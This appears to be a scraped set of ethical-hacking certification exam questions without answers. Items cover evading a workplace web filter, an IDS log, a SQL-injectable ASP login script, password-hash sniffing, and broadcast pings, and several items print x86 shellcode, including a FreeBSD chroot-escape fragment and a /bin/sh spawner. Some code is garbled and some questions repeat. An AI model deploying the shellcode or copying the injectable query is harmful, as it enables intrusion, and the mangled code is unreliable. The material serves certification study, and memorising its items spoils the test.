What could Michelle do to still gain access to Myspace.com?
Michelle is a CPA working in the Accounting department for Beyerton & Associates. Michelle works on a Windows XP SP2 computer. Michelle’s daily duties take up about 6 hours out of her 8 hour workday. This leaves her about 2 hours a day where she can surf the Internet. Michelle goes to Myspace.com quite a bit during this free time to stay in touch with friends. After a new IT policy is implemented, sites like Myspace are blocked so users cannot get to them. The IT department is using an Internet filter to block specific websites such as Myspace. Michelle really wants to go to Myspace to stay in touch with the people she knows, even though it is now prohibited by an IT policy. What could Michelle do to still gain access to Myspace.com?
Study the log given below and answer the following questions.
Study the log given below and answer the following questions.
Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169
Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53
Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21
Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53
Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111
Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80
Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53
Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0)
Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506)
Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080
Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558
Interpret the following entry: Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
Study the following log extract and identify the attack.
Study the following log extract and identify the attack.
A.
Cross Site Scripting
B.
Hexcode Attack
C.
Unicode Directory Traversal Attack
D.
Multiple Domain Traversal Attack
What is the problem with this ASP script (login.asp)?
What is the problem with this ASP script (login.asp)?
<%
Set objConn = CreateObject(“ADODB.Connection”)
objConn.Open Application(“WebUsersConnection”)
sSQL=”SELECT * FROM Users where Username='” & Request(“user”) & _ “‘ and Password='” & Request(“pwd”) & “‘”
Set RS = objConn.Execute(sSQL)
If RS.EOF then
Response.Redirect(“login.asp?msg=Invalid Login”)
Else
Session.Authorized = True
Set RS = nothing
Set objConn = nothing
Response.Redirect(“mainpage.asp”)
End If
%>
Why Jess is not picking up hashed from the network?
Jess the hacker runs L0phtCrack’s built-in sniffer utility which grabs SMB password hashes and stores them for offline cracking. Once cracked, these passwords can provide easy access to whatever network resources the user account has access to. But Jess is not picking up hashed from the network. Why?
Which of the following display filters will you enable in Ethereal to view the three-way handshake for…
Which of the following display filters will you enable in Ethereal to view the three-way handshake for a connection from host 192.168.0.1?
Why only 13 hosts send a reply while others do not?
One of the ways to map a targeted network for live hosts is by sending an ICMP ECHO request to the broadcast or the network address. The request would be broadcasted to all hosts on the targeted network. The live hosts will send an ICMP ECHO Reply to the attacker’s source IP address.
You send a ping request to the broadcast address 192.168.5.255.
[root@ceh/root]# ping -b 192.168.5.255
WARNING: pinging broadcast address
PING 192.168.5.255 (192.168.5.255) from 192.168.5.1 : 56(84) bytes of data. 64 bytes from 192.168.5.1: icmp_seq=0 ttl=255 time=4.1 ms 64 bytes from 192.168.5.5: icmp_seq=0 ttl=255 time=5.7 ms —
—
—
There are 40 computers up and running on the target network. Only 13 hosts send a reply while others do not. Why?
The following exploit code is extracted from what kind of attack?
#define
MAKE_STR_FROM_RET(x) ((x)&0xff), (((x)
&0xff00)8), (((x)&0xff0000)16), (((x)
&0xff000000)24) char infin_loop[]= /* for testing
purposes */ “\xEB\xFE”; char bsdcode[] = /*
Lam3rZ chroot() code rewritten for FreeBSD by
venglin */ “\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80
\x31\xdb\x31\xc0\x43” “\x43\x53\x4b\x53\x53
\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0”
“\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01
\x53\x53\xb0” “\x88\xcd\x80\x31\xc0\x8d\x5e\x01
\x53\x53\xb0\x3d\xcd\x80” “\x31\xc0\x31
\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9”
“\x31\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80
\xfe\xc9\x75” “\xf1\x31\xc0\x88\x46\x09
\x8d\x5e\x08\x53\x53\xb0\x3d\xcd” “\x80
\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88
\x46” “\x07\x89\x76\x08\x89\x46\x0c\x89\xf3
\x8d\x4e\x08\x8d\x56” “\x0c\x52\x51\x53\x53\xb0
\x3b\xcd\x80\x31\xc0\x31\xdb\x53” “\x53\xb0
\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\x01
\xff\xff\x30” “\x62\x69\x6e\x30\x73\x68\x31
\x2e\x2e\x31\x31\x76\x65\x6e” “\x67\x6c\x69
\x6e”;static int magic[MAX_MAGIC],magic_d
[MAX_MAGIC]; static char *magic_str=NULL;
int before_len=0; char *target=NULL,
*username=”user”, *password=NULL; struct
targets getit;
The following exploit code is extracted from what kind of attack?
What can he infer from this file?
While investigating a claim of a user downloading illegal material, the investigator goes through the files on the suspect’s workstation. He comes across a file that is just called “file.txt” but when he opens it, he finds the following:
#define MAKE_STR_FROM_RET(x)
((x)&0xff),(((x)&0xff00)>>8),(((x)&0xff0000)>>16),(((x)&0xff000000)>>24) char infin_loop[]= /* for testing purposes */
“\xEB\xFE”;
char bsdcode[] = /* Lam3rZ chroot() code by venglin */
“\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43”
“\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0”
“\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x53\xb0”
“\x88\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80”
“\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9”
“\x31\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75”
“\xf1\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd”
“\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46”
“\x07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56”
“\x0c\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53”
“\x53\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\x01\xff\xff\x30”
“\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e”
“\x67\x6c\x69\x6e”;
static int magic[MAX_MAGIC],magic_d[MAX_MAGIC];
static char *magic_str=NULL;
int before_len=0;
What can he infer from this file?
When writing shellcodes, you must avoid ____________ because these will end the string.
When writing shellcodes, you must avoid ____________ because these will end the string.
charhellcode[]
f11 “\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b”
f11 “\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd”
f11 “\x80\xe8\xdc\xff\xff\xff/bin/sh”;
voidain()?
{ int?ret;
f11 ?
ret??int?)&ret??;
f11 ?
(*ret)??int)shellcode;
}